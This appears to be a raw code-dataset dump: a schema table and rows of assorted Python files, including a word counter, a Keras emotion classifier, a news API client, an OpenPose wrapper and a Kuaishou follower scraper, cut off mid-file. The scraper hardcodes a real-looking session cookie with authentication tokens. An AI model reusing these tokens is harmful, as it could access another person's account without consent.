hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cdb91795db8c176b9e6d1d2b0ffc0bc2b063adbd | 857 | py | Python | Lessons/Chapter9Exercise1.py | Luderio/Scientific-Computing-with-Python | c7eebcc3b46b68b3d5c08ad25fb802ae9ff42f7f | [
"MIT"
]
| null | null | null | Lessons/Chapter9Exercise1.py | Luderio/Scientific-Computing-with-Python | c7eebcc3b46b68b3d5c08ad25fb802ae9ff42f7f | [
"MIT"
]
| null | null | null | Lessons/Chapter9Exercise1.py | Luderio/Scientific-Computing-with-Python | c7eebcc3b46b68b3d5c08ad25fb802ae9ff42f7f | [
"MIT"
]
| null | null | null | wordCounter = dict()
while True :
inputFile = input('Enter a file: ')
try :
fileName = open(inputFile)
except :
fileName = 'invalid'
if fileName == 'invalid' :
if inputFile == 'done' :
break
else :
print('Invalid Input')
continue
for lines in fileName :
lines = lines.rstrip()
words = lines.split()
for wordItems in words :
wordCounter[wordItems] = wordCounter.get(wordItems, 0) + 1
largestWordCount = None
largestWord = None
for word,count in wordCounter.items() :
if largestWordCount is None or count > largestWordCount :
largestWord = word
largestWordCount = count
print('Largest Word:', largestWord, 'Count:', largestWordCount)
print(wordCounter)
continue
| 25.969697 | 70 | 0.574096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.091015 |
cdb943e87aa2338b8600a2d1fc39c5fdf842f690 | 1,022 | py | Python | iris/cli/help.py | kpanic/lymph | 5681de5e65ee72efb96012608fc5189a48adafcd | [
"Apache-2.0"
]
| null | null | null | iris/cli/help.py | kpanic/lymph | 5681de5e65ee72efb96012608fc5189a48adafcd | [
"Apache-2.0"
]
| null | null | null | iris/cli/help.py | kpanic/lymph | 5681de5e65ee72efb96012608fc5189a48adafcd | [
"Apache-2.0"
]
| null | null | null | from iris.cli.base import Command, format_docstring, get_command_class
HELP = format_docstring("""
Usage: iris [options] <command> [<args>...]
Iris is the personification of the rainbow and messenger of the gods.
{COMMON_OPTIONS}
Commands:
instance Run a single service instance (one process).
node Run a node service that manages a group of processes on the same
machine.
request Send a request message to some service and output the reply.
inspect Describe the available rpc methods of a service.
tail Stream the logs of one or more services.
discover Show available services.
help Display help information about iris.
""")
class HelpCommand(Command):
"""
Usage: iris help [<command>]
"""
short_description = 'Display help information about iris.'
needs_config = False
def run(self):
name = self.args['<command>']
if name:
print(get_command_class(name).get_help())
else:
print(HELP)
| 26.894737 | 77 | 0.671233 | 332 | 0.324853 | 0 | 0 | 0 | 0 | 0 | 0 | 681 | 0.666341 |
cdb9f5699b06eaa0f164fb54a701bb1fdb951c1f | 3,321 | py | Python | src/Featurizers/DateTimeFeaturizerData/Tools/JsonGenerator.py | Bhaskers-Blu-Org2/FeaturizersLibrary | 229ae38ea233bfb02a6ff92ec3a67c1751c58005 | [
"MIT"
]
| 15 | 2019-12-14T07:54:18.000Z | 2021-03-14T14:53:28.000Z | src/Featurizers/DateTimeFeaturizerData/Tools/JsonGenerator.py | Lisiczka27/FeaturizersLibrary | dc7b42abd39589af0668c896666affb4abe8a622 | [
"MIT"
]
| 30 | 2019-12-03T20:58:56.000Z | 2020-04-21T23:34:39.000Z | src/Featurizers/DateTimeFeaturizerData/Tools/JsonGenerator.py | Lisiczka27/FeaturizersLibrary | dc7b42abd39589af0668c896666affb4abe8a622 | [
"MIT"
]
| 13 | 2020-01-23T00:18:47.000Z | 2021-10-04T17:46:45.000Z | # ----------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License
# ----------------------------------------------------------------------
"""Generates JSON files based on data previously pickled"""
import lzma
import os
import pickle
import sys
import json
# Note that this isn't used directly, but is required by the picked python content
import pandas as pd
import CommonEnvironment
from CommonEnvironment import CommandLine
from CommonEnvironment import FileSystem
from CommonEnvironment.StreamDecorator import StreamDecorator
# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------
@CommandLine.EntryPoint(
)
@CommandLine.Constraints(
zipped_input_filename=CommandLine.FilenameTypeInfo(),
output_stream=None,
)
def EntryPoint(
zipped_input_filename,
output_stream=sys.stdout,
):
"""Generates JSON files based on data previously pickled"""
with StreamDecorator(output_stream).DoneManager(
line_prefix="",
prefix="\nResults: ",
suffix="\n",
) as dm:
output_dir = os.path.join(_script_dir, "..", "GeneratedCode")
FileSystem.RemoveTree(output_dir)
FileSystem.MakeDirs(output_dir)
df = _holiday_data_loader(zipped_input_filename)
#with open('holidays.json', 'w') as f:
#f.write(df.to_json(orient='records', lines=True))
allCountryNames = list(set((df['countryOrRegion'])))
for countryName in allCountryNames:
dfByCountry = df.loc[df['countryOrRegion'] == countryName]
date = [int(x.timestamp()) for x in list(dfByCountry['date'])]
name = list(dfByCountry['normalizeHolidayName'])
date_dict = {"Date" : date}
name_dict = {"Holiday" : name}
out = {}
out.update(date_dict)
out.update(name_dict)
jsonPath = os.path.join(output_dir, "{}.json".format(countryName))
with open(jsonPath, 'w') as f:
json.dump(out, f)
return dm.result
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def _holiday_data_loader(_path):
"""Load holiday data as a static initializer."""
with lzma.open(_path, "rb") as fr:
df = pickle.loads(fr.read())
df['countryRegionCode'] = df['countryRegionCode'] \
.apply(lambda x: x if type(x) == str else None)
df['isPaidTimeOff'] = df['isPaidTimeOff'] \
.apply(lambda x: x if type(x) == bool else None)
return df
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
if __name__ == "__main__":
try:
sys.exit(CommandLine.Main())
except KeyboardInterrupt:
pass
| 34.957895 | 82 | 0.504065 | 0 | 0 | 0 | 0 | 1,412 | 0.425173 | 0 | 0 | 1,356 | 0.408311 |
cdba82790169d516d43e4d1c83b7c0a26c10e1fe | 7,152 | py | Python | fer.py | MahmoudSabra1/Emotion-recognition-song-recommendation | 5cad8413b6c98cee12798334009fe8942a420527 | [
"MIT"
]
| 11 | 2020-11-11T14:52:05.000Z | 2022-03-11T11:37:42.000Z | fer.py | MahmoudSabra1/Emotion-recognition-song-recommendation | 5cad8413b6c98cee12798334009fe8942a420527 | [
"MIT"
]
| 1 | 2021-06-21T06:42:59.000Z | 2021-06-21T06:42:59.000Z | fer.py | MahmoudSabra1/Emotion-recognition-song-recommendation | 5cad8413b6c98cee12798334009fe8942a420527 | [
"MIT"
]
| 7 | 2021-01-26T03:40:12.000Z | 2021-12-20T12:24:34.000Z | # Two lines that remove tensorflow GPU logs
# import os
# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from keras.optimizers import Adam
from keras.models import Sequential, model_from_json
from keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout, BatchNormalization, Activation
from keras.preprocessing.image import ImageDataGenerator
from sklearn import model_selection
from math import ceil
# Loads csv files and appends pixels to X and labels to y
def preprocess_data():
data = pd.read_csv('fer2013.csv')
labels = pd.read_csv('fer2013new.csv')
orig_class_names = ['neutral', 'happiness', 'surprise', 'sadness', 'anger', 'disgust', 'fear', 'contempt',
'unknown', 'NF']
n_samples = len(data)
w = 48
h = 48
y = np.array(labels[orig_class_names])
X = np.zeros((n_samples, w, h, 1))
for i in range(n_samples):
X[i] = np.fromstring(data['pixels'][i], dtype=int, sep=' ').reshape((h, w, 1))
return X, y
def clean_data_and_normalize(X, y):
orig_class_names = ['neutral', 'happiness', 'surprise', 'sadness', 'anger', 'disgust', 'fear', 'contempt',
'unknown', 'NF']
# Using mask to remove unknown or NF images
y_mask = y.argmax(axis=-1)
mask = y_mask < orig_class_names.index('unknown')
X = X[mask]
y = y[mask]
# Convert to probabilities between 0 and 1
y = y[:, :-2] * 0.1
# Add contempt to neutral and remove it
y[:, 0] += y[:, 7]
y = y[:, :7]
# Normalize image vectors
X = X / 255.0
return X, y
def split_data(X, y):
test_size = ceil(len(X) * 0.1)
# Split Data
x_train, x_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=test_size, random_state=42)
x_train, x_val, y_train, y_val = model_selection.train_test_split(x_train, y_train, test_size=test_size,
random_state=42)
return x_train, y_train, x_val, y_val, x_test, y_test
def data_augmentation(x_train):
shift = 0.1
datagen = ImageDataGenerator(
rotation_range=20,
horizontal_flip=True,
height_shift_range=shift,
width_shift_range=shift)
datagen.fit(x_train)
return datagen
def show_augmented_images(datagen, x_train, y_train):
it = datagen.flow(x_train, y_train, batch_size=1)
plt.figure(figsize=(10, 7))
for i in range(25):
plt.subplot(5, 5, i + 1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(it.next()[0][0], cmap='gray')
# plt.xlabel(class_names[y_train[i]])
plt.show()
def define_model(input_shape=(48, 48, 1), classes=7):
num_features = 64
model = Sequential()
# 1st stage
model.add(Conv2D(num_features, kernel_size=(3, 3), input_shape=input_shape))
model.add(BatchNormalization())
model.add(Activation(activation='relu'))
model.add(Conv2D(num_features, kernel_size=(3, 3)))
model.add(BatchNormalization())
model.add(Activation(activation='relu'))
model.add(Dropout(0.5))
# 2nd stage
model.add(Conv2D(num_features, (3, 3), activation='relu'))
model.add(Conv2D(num_features, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
# 3rd stage
model.add(Conv2D(2 * num_features, kernel_size=(3, 3)))
model.add(BatchNormalization())
model.add(Activation(activation='relu'))
model.add(Conv2D(2 * num_features, kernel_size=(3, 3)))
model.add(BatchNormalization())
model.add(Activation(activation='relu'))
# 4th stage
model.add(Conv2D(2 * num_features, (3, 3), activation='relu'))
model.add(Conv2D(2 * num_features, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
# 5th stage
model.add(Conv2D(4 * num_features, kernel_size=(3, 3)))
model.add(BatchNormalization())
model.add(Activation(activation='relu'))
model.add(Conv2D(4 * num_features, kernel_size=(3, 3)))
model.add(BatchNormalization())
model.add(Activation(activation='relu'))
model.add(Flatten())
# Fully connected neural networks
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(classes, activation='softmax'))
return model
def plot_acc_loss(history):
# Plot accuracy graph
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label='val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('accuracy')
plt.ylim([0, 1.0])
plt.legend(loc='upper left')
plt.show()
# Plot loss graph
plt.plot(history.history['loss'], label='loss')
plt.plot(history.history['val_loss'], label='val_loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
# plt.ylim([0, 3.5])
plt.legend(loc='upper right')
plt.show()
def save_model_and_weights(model, test_acc):
# Serialize and save model to JSON
test_acc = int(test_acc * 10000)
model_json = model.to_json()
with open('Saved-Models\\model' + str(test_acc) + '.json', 'w') as json_file:
json_file.write(model_json)
# Serialize and save weights to JSON
model.save_weights('Saved-Models\\model' + str(test_acc) + '.h5')
print('Model and weights are saved in separate files.')
def load_model_and_weights(model_path, weights_path):
# Loading JSON model
json_file = open(model_path, 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
# Loading weights
model.load_weights(weights_path)
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
print('Model and weights are loaded and compiled.')
def run_model():
fer_classes = ['neutral', 'happiness', 'surprise', 'sadness', 'anger', 'disgust', 'fear']
X, y = preprocess_data()
X, y = clean_data_and_normalize(X, y)
x_train, y_train, x_val, y_val, x_test, y_test = split_data(X, y)
datagen = data_augmentation(x_train)
epochs = 100
batch_size = 64
print("X_train shape: " + str(x_train.shape))
print("Y_train shape: " + str(y_train.shape))
print("X_test shape: " + str(x_test.shape))
print("Y_test shape: " + str(y_test.shape))
print("X_val shape: " + str(x_val.shape))
print("Y_val shape: " + str(y_val.shape))
# Training model from scratch
model = define_model(input_shape=x_train[0].shape, classes=len(fer_classes))
model.summary()
model.compile(optimizer=Adam(lr=0.0001), loss='binary_crossentropy', metrics=['accuracy'])
history = model.fit(datagen.flow(x_train, y_train, batch_size=batch_size), epochs=epochs,
steps_per_epoch=len(x_train) // batch_size,
validation_data=(x_val, y_val), verbose=2)
test_loss, test_acc = model.evaluate(x_test, y_test, batch_size=batch_size)
plot_acc_loss(history)
save_model_and_weights(model, test_acc)
run_model()
| 32.216216 | 115 | 0.65646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,449 | 0.202601 |
cdbc9720aa5c6f9258b24ce41fb35960b581a3f8 | 705 | py | Python | manual.py | Taschenbergerm/bgg_miner | f20057ec2e85e20ad08f92514ce38c699e8c85eb | [
"MIT"
]
| null | null | null | manual.py | Taschenbergerm/bgg_miner | f20057ec2e85e20ad08f92514ce38c699e8c85eb | [
"MIT"
]
| null | null | null | manual.py | Taschenbergerm/bgg_miner | f20057ec2e85e20ad08f92514ce38c699e8c85eb | [
"MIT"
]
| null | null | null | from pprint import pprint
import requests
from lxml import etree
def itter(tree):
for ele in tree.iter():
print("##########################")
print("Tag:", ele.tag)
print("Text:", ele.text)
print("Attributes:", ele.attrib)
print("##########################")
def main():
# url = f"https://www.boardgamegeek.com/xmlapi/boardgame/174430"
url = f"https://www.boardgamegeek.com/xmlapi2/thing"
response = requests.get(url, params={"id": 174430, "stats": 1})
print(response.request.url)
print(response.status_code)
print(response.content)
tree = etree.fromstring(response.content)
itter(tree)
if __name__ == "__main__":
main()
| 27.115385 | 68 | 0.591489 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 213 | 0.302128 |
cdbd2bded66eee36ec46ada4de75a010512f317b | 2,962 | py | Python | app/requests.py | gabrielcoder247/News-Highlight-v2 | 595f4ee9739b173142d1012bdda63526818930e4 | [
"Unlicense"
]
| null | null | null | app/requests.py | gabrielcoder247/News-Highlight-v2 | 595f4ee9739b173142d1012bdda63526818930e4 | [
"Unlicense"
]
| null | null | null | app/requests.py | gabrielcoder247/News-Highlight-v2 | 595f4ee9739b173142d1012bdda63526818930e4 | [
"Unlicense"
]
| null | null | null | import urllib.request,json
from .models import Source,Article
from . import main
# Getting Api Key
api_Key = None
#Getting the base urls
sources_base_url = None
articles_base_url = None
def configure_request(app):
'''
Function to acquire the api key and base urls
'''
global api_Key,sources_base_url,articles_base_url
api_Key = app.config['NEWS_API_KEY']
sources_base_url = app.config['NEWS_SOURCES_BASE_URL']
articles_base_url = app.config['NEWS_ARTICLES_BASE_URL']
def get_sources(category):
'''
Function that gets the json response to our url request
'''
get_sources_url = sources_base_url.format(category)
with urllib.request.urlopen(get_sources_url,data=None) as url:
get_sources_data = url.read()
get_sources_response = json.loads(get_sources_data)
sources_results = None
if get_sources_response['sources']:
sources_results_list = get_sources_response['sources']
sources_results = process_sources(sources_results_list)
# print(sources_results)
return sources_results
def process_sources(sources_results):
'''
Function that processes the sources result and transform them to a list of Objects
Args:
sources_results: A list of dictionaries that contain sources details
Returns :
sources_list: A list of sources objects
'''
sources_list = []
for source_item in sources_results:
id = source_item.get('id')
name = source_item.get('name')
description = source_item.get('description')
url = source_item.get('url')
category = source_item.get('category')
source_object = Source(id,name,description,url,category)
sources_list.append(source_object)
return sources_list
def get_articles(source):
'''
Function that gets the json response to our url request
'''
get_articles_url = articles_base_url.format(source,api_Key)
with urllib.request.urlopen(get_articles_url,data=None) as url:
get_articles_data = url.read()
get_articles_response = json.loads(get_articles_data)
articles_results = None
if get_articles_response['articles']:
articles_results_list = get_articles_response['articles']
articles_results = process_articles(articles_results_list)
return articles_results
def process_articles(articles_results):
'''
Function that processes the articles result and transform them to a list of Objects
Args:
articles_results: A list of dictionaries that contain articles details
Returns :
articles_list: A list of articles objects
'''
articles_list = []
for article_item in articles_results:
name = article_item.get('name')
author = article_item.get('author')
title = article_item.get('title')
description = article_item.get('description')
url = article_item.get('url')
urlToImage = article_item.get('urlToImage')
publishedAt = article_item.get('publishedAt')
if publishedAt and author and urlToImage:
article_object = Article(name,author,title,description,url,urlToImage,publishedAt)
articles_list.append(article_object)
return articles_list | 30.854167 | 85 | 0.778528 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 906 | 0.305874 |
cdc3ceae4eb0b0fc7a29f9482fb7047dcfef58b4 | 727 | py | Python | main.py | csmyth93/solo_scoring | 6c1a32a3430058aa7d51be604dcc02d11ce85edd | [
"MIT"
]
| null | null | null | main.py | csmyth93/solo_scoring | 6c1a32a3430058aa7d51be604dcc02d11ce85edd | [
"MIT"
]
| null | null | null | main.py | csmyth93/solo_scoring | 6c1a32a3430058aa7d51be604dcc02d11ce85edd | [
"MIT"
]
| null | null | null | def get_names():
names = []
while True:
name = input("Enter players name: ")
if name != 'done':
print(f'{name} added to the list of players')
names.append(name)
continue
else:
break
return names
def get_player_scores(players):
for player in players:
scores = []
while True:
score = input(f"What are {player}'s final cards? ")
if score != 'end':
scores.append(score)
continue
else:
break
return scores
if __name__ == '__main__':
players = get_names()
print(players)
scores = get_player_scores(players)
print(scores)
| 22.71875 | 63 | 0.515818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 117 | 0.160935 |
cdc3dc53bc12e7691159632083c1b94dc1973dac | 74 | py | Python | tests/unit/conftest.py | fourTheorem/slic-slack | cffc870c2399feff67199050460abdcb3385ef17 | [
"Apache-2.0"
]
| 4 | 2022-01-14T15:47:55.000Z | 2022-01-14T16:15:18.000Z | tests/unit/conftest.py | fourTheorem/slic-slack | cffc870c2399feff67199050460abdcb3385ef17 | [
"Apache-2.0"
]
| null | null | null | tests/unit/conftest.py | fourTheorem/slic-slack | cffc870c2399feff67199050460abdcb3385ef17 | [
"Apache-2.0"
]
| null | null | null | import os
os.environ['SLACK_WEBHOOK_URL'] = 'https://example.com/slack'
| 14.8 | 61 | 0.72973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 46 | 0.621622 |
cdc442d6b9ce4b9876165256e71bc1dbffd0f620 | 760 | py | Python | python/twisted/web_echo.py | y2ghost/work | b7f5b02db9dc0df6157bc799ddb4a1ac9d574cf3 | [
"MIT"
]
| null | null | null | python/twisted/web_echo.py | y2ghost/work | b7f5b02db9dc0df6157bc799ddb4a1ac9d574cf3 | [
"MIT"
]
| null | null | null | python/twisted/web_echo.py | y2ghost/work | b7f5b02db9dc0df6157bc799ddb4a1ac9d574cf3 | [
"MIT"
]
| null | null | null | from twisted.protocols import basic
from twisted.internet import protocol, reactor
class HTTPEchoProtocol(basic.LineReceiver):
def __init__(self):
self.lines = []
def lineReceived(self, line):
self.lines.append(line.decode())
if not line:
self.sendResponse()
def sendResponse(self):
self.sendLine(b"HTTP/1.1 200 OK")
self.sendLine(b"")
responseBody = "You said:\r\n\r\n" + "\r\n".join(self.lines)
data = responseBody.encode()
self.transport.write(data)
self.transport.loseConnection()
class HTTPEchoFactory(protocol.ServerFactory):
def buildProtocol(self, addr):
return HTTPEchoProtocol()
reactor.listenTCP(8000, HTTPEchoFactory())
reactor.run()
| 27.142857 | 68 | 0.661842 | 614 | 0.807895 | 0 | 0 | 0 | 0 | 0 | 0 | 46 | 0.060526 |
cdc5a62dbf81299334c3372e259e1e6b484185cd | 2,804 | py | Python | app01/tools.py | xinxinliang/ksDjango | 0c0f4a5842cf225e77035b716979fcf9b8d03311 | [
"Apache-2.0"
]
| 13 | 2021-03-11T12:35:29.000Z | 2022-02-25T02:22:47.000Z | app01/tools.py | xinxinliang/ksDjango | 0c0f4a5842cf225e77035b716979fcf9b8d03311 | [
"Apache-2.0"
]
| 1 | 2021-11-04T03:02:10.000Z | 2021-11-04T03:02:10.000Z | app01/tools.py | xinxinliang/ksDjango | 0c0f4a5842cf225e77035b716979fcf9b8d03311 | [
"Apache-2.0"
]
| 4 | 2021-06-12T19:27:01.000Z | 2022-02-04T05:13:54.000Z | import requests
import json
import os
import time
from app01.models import UserTitle
# 爬取个人主页关注用户的id和naame
URL = "https://video.kuaishou.com/graphql"
headers = {
"accept":"*/*",
"Content-Length":"<calculated when request is sent>",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"content-type": "application/json",
"Cookie": r'kpf=PC_WEB; kpn=KUAISHOU_VISION; clientid=3; did=web_ec874916e390b9741609686125a0452e; didv=1613879531823; client_key=65890b29; ktrace-context=1|MS43NjQ1ODM2OTgyODY2OTgyLjc1MjgyMjUyLjE2MTU0NDI5NDQ0MzYuMTU2OTE=|MS43NjQ1ODM2OTgyODY2OTgyLjIxMjcxODY4LjE2MTU0NDI5NDQ0MzYuMTU2OTI=|0|graphql-server|webservice|false|NA; userId=427400950; kuaishou.server.web_st=ChZrdWFpc2hvdS5zZXJ2ZXIud2ViLnN0EqABUkHhV7V4kZgEsKH5ujlHNWEHV_KRDoBGhvSztjMMB54VfcpY6EJgzK_b3ZYFhM0obMSTVBDc7Csb-KuDKQpR8sobH5ozd82kEMIV5eb3S0QSJBxAemnSYimqR5IskD_IGA06cph50uA_oH2OftW2tSpaBuXl3vyYhFv6aS_24d8z0n9WILEo5JcTI0QpDdmDoRnXxHc_x7JHIR3s1pBlBhoSzFZBnBL4suA5hQVn0dPKLsMxIiDp66EsPPenAZG6MBgmJkQL2mrCKEDn1OPcTisxS6wffSgFMAE; kuaishou.server.web_ph=cb43dea88ab3a4c31dd231f2dc9cc29b8680',
"Host": "video.kuaishou.com",
"Origin": "https://video.kuaishou.com",
"Referer": "https://video.kuaishou.com/profile/3xsms2z7ft9fmhg",
"User-Agent": "PostmanRuntime/7.26.8"
}
payload = {"operationName":"visionProfileUserList","variables":{"ftype":1},"query":"query visionProfileUserList($pcursor: String, $ftype: Int) {\n visionProfileUserList(pcursor: $pcursor, ftype: $ftype) {\n result\n fols {\n user_name\n headurl\n user_text\n isFollowing\n user_id\n __typename\n }\n hostName\n pcursor\n __typename\n }\n}\n"}
def get_data():
res = requests.post(URL, headers=headers, json=payload)
res.encoding = "utf-8"
m_json = res.json() # 字典格式
fols_list = m_json["data"]["visionProfileUserList"]["fols"]
pcursor = m_json["data"]["visionProfileUserList"]["pcursor"]
payload["variables"]["pcursor"] = pcursor
for fols in fols_list:
userID = fols["user_id"]
userName = fols["user_name"]
# 提交请求把数据填到数据库
add_data(userID,userName)
# 需要设置延迟
time.sleep(1)
print("userID:%s-------userName:%s" % (userID, userName))
if pcursor == "no_more":
return 0
def add_data(userID,userName):
if not UserTitle.objects.filter(userID=userID):
UserTitle.objects.create(userID=userID, userName=userName)
print("ID为%s的用户存入数据库成功++++++++++++++"%(userID))
else:
print("ID为%s的用户已经存在数据库---------------" % (userID))
def start_data():
while (1):
temp = get_data()
if temp == 0:
break
print("---------------------当前用户地址完成-------------------")
if __name__ == "__main__":
start_data() | 43.8125 | 760 | 0.696148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,928 | 0.657572 |
cdc5fa09b3e8bd5d035d3ebb8b21feb4b7b64279 | 2,183 | py | Python | core/thirdparty/load_openpose.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
]
| 8 | 2020-10-08T13:32:33.000Z | 2021-12-08T10:59:03.000Z | core/thirdparty/load_openpose.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
]
| null | null | null | core/thirdparty/load_openpose.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
]
| 1 | 2021-04-15T23:50:13.000Z | 2021-04-15T23:50:13.000Z | import os
import sys
this_dir = os.path.dirname(__file__)
import numpy as np
openpose_path = os.path.join(this_dir, 'openpose')
op_release_path = os.path.join(openpose_path, 'Release')
model_path = os.path.join(openpose_path, 'models')
print(op_release_path)
sys.path.append(op_release_path);
os.environ['PATH'] = os.environ['PATH'] + ';' + openpose_path + '/x64/Release;' + openpose_path + '/bin;'
import pyopenpose as op
opWrapper = op.WrapperPython()
params = dict()
params["model_folder"] = model_path
params["number_people_max"] = 1
params["net_resolution"]="-1x160"
params["body"] = 1
params["output_resolution"] = "-1x-1"
params["disable_multi_thread"] = True
opWrapper.configure(params)
opWrapper.start()
class PoseEstimator():
def __init__(self):
self.RShColor = (0, 140, 255)
self.LShColor = (0, 255, 215)
self.NeckColor = (0, 0, 215)
self.NoseColor = (215, 0, 215)
def _keypoint_to_index(self,keypoints):
v = keypoints[:,1]
u = keypoints[:,0]
idx = np.array([v,u]).astype(np.int).transpose()
return idx
def find_body_on_2D(self, src_img, verts):
datum = op.Datum()
datum.cvInputData = src_img
opWrapper.emplaceAndPop([datum])
self.op_img = datum.cvOutputData
#print(datum.poseKeypoints)
# Check validity
if not str(datum.poseKeypoints.shape) == '(1, 25, 3)':
return np.zeros((25, 3)).astype(np.int)
data = datum.poseKeypoints
# self.RShoulder2D = np.array([data[0,2,0], data[0,2,1]])
# self.LShoulder2D = np.array([data[0,5,0], data[0,5,1]])
# self.Neck2D = np.array([data[0,1,0], data[0,1,1]])
# keypoint = np.array([self.RShoulder2D, self.LShoulder2D, self.Neck2D]).astype(np.int)
# return keypoint
keypoints = data[0]
# switch (u,v) -> (v,u)
idx = self._keypoint_to_index(keypoints)
return idx
def just_find_body_on_2D(self, src_img):
datum = op.Datum()
datum.cvInputData = src_img
opWrapper.emplaceAndPop([datum])
self.op_img = datum.cvOutputData
return datum.cvOutputData, datum.poseKeypoints | 35.209677 | 107 | 0.639487 | 1,466 | 0.671553 | 0 | 0 | 0 | 0 | 0 | 0 | 523 | 0.239579 |
cdc633f283f26d40a91533035d25cbe1abaa2d61 | 11,193 | py | Python | pybench/benchmarks/benchmark_ml.py | pentschev/pybench | 89d65a6c418a1fee39d447bd11b8a999835b74a9 | [
"Apache-2.0"
]
| 14 | 2019-06-29T19:19:10.000Z | 2022-03-31T06:40:33.000Z | pybench/benchmarks/benchmark_ml.py | pentschev/pybench | 89d65a6c418a1fee39d447bd11b8a999835b74a9 | [
"Apache-2.0"
]
| 2 | 2019-07-23T22:06:37.000Z | 2019-08-19T22:15:32.000Z | pybench/benchmarks/benchmark_ml.py | pentschev/pybench | 89d65a6c418a1fee39d447bd11b8a999835b74a9 | [
"Apache-2.0"
]
| 5 | 2019-07-23T14:48:48.000Z | 2020-04-01T08:43:00.000Z | import pytest
import importlib
import numba, numba.cuda
import numpy as np
from pybench import run_benchmark
_shapes = {
"small": [(int(2 ** 14), 512), (int(2 ** 15), 512), (int(2 ** 16), 512)],
"large": [(int(2 ** 20), 512), (int(2 ** 21), 512), (int(2 ** 22), 512)],
}
def load_data(nrows, ncols, cached, train_split=1.0, label_col=None):
import gzip
import os
import numpy as np, gzip, os
import pandas as pd
train_rows = int(nrows * train_split)
if os.path.exists(cached):
with gzip.open(cached) as f:
X = np.load(f)
if train_split < 1.0 and label_col is not None:
X = X[:, [i for i in range(X.shape[1]) if i != label_col]]
y = X[:, label_col : label_col + 1]
rindices = np.random.randint(0, X.shape[0] - 1, nrows)
X = X[rindices, :ncols]
y = y[rindices]
df_y_train = pd.DataFrame(
{"fea%d" % i: y[0:train_rows, i] for i in range(y.shape[1])}
)
df_y_test = pd.DataFrame(
{"fea%d" % i: y[train_rows:, i] for i in range(y.shape[1])}
)
else:
X = X[np.random.randint(0, X.shape[0] - 1, nrows), :ncols]
else:
# throws FileNotFoundError error if mortgage dataset is not present
raise FileNotFoundError(
"Please download the required dataset or check the path"
)
if train_split < 1.0 and label_col is not None:
df_X_train = pd.DataFrame(
{"fea%d" % i: X[0:train_rows, i] for i in range(X.shape[1])}
)
df_X_test = pd.DataFrame(
{"fea%d" % i: X[train_rows:, i] for i in range(X.shape[1])}
)
return {
"X_train": df_X_train,
"X_test": df_X_test,
"y_train": df_y_train,
"y_test": df_y_test,
}
else:
df = pd.DataFrame({"fea%d" % i: X[:, i] for i in range(X.shape[1])})
return df
def load_mortgage(d):
kwargs = {"nrows": d["shape"][0], "ncols": d["shape"][1], "cached": d["data"]}
if "train_split" in d:
